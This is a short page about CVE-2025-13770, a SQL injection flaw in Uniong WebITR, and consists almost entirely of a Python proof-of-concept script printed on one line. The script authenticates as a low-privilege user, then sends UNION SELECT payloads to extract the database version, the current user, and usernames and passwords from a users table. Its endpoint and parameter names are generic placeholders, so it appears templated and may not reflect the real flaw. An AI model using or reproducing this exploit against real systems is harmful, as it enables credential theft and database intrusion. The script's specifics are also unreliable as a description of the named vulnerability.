CVE-2025-13770 Uniong WebITR SQL注入漏洞

import requests import sys # CVE-2025-13770 SQL Injection PoC for WebITR # Target: WebITR application by Uniong # Vulnerability: SQL Injection in authenticated module target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-website.com" username = sys.argv[2] if len(sys.argv) > 2 else "lowpriv_user" password = sys.argv[3] if len(sys.argv) > 3 else "password123" # Step 1: Authenticate to get session session = requests.Session() login_data = { "username": username, "password": password } login_response = session.post(f"{target_url}/login", data=login_data) if login_response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Exploit SQL Injection # Payload to extract database version and current user sql_payload = "' UNION SELECT NULL,@@version,user(),NULL--" injection_params = { "parameter": sql_payload } response = session.get(f"{target_url}/vulnerable_endpoint", params=injection_params) if "5." in response.text or "8." in response.text: print("[+] SQL Injection successful - Database info extracted") print(f"[*] Response contains: {response.text[:500]}") else: print("[-] SQL Injection may have failed or no data returned") # Step 3: Extract database contents (example: users table) extract_payload = "' UNION SELECT NULL,username,password,NULL FROM users--" extraction_params = { "parameter": extract_payload } response = session.get(f"{target_url}/vulnerable_endpoint", params=extraction_params) print(f"[*] Extracted data: {response.text[:1000]}")